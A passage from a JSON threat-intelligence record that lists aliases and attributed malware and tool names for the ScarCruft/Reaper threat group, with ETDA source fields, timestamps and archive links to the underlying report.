				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434300,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.pdf",
		"text": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.txt",
		"img": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.jpg"
	}
}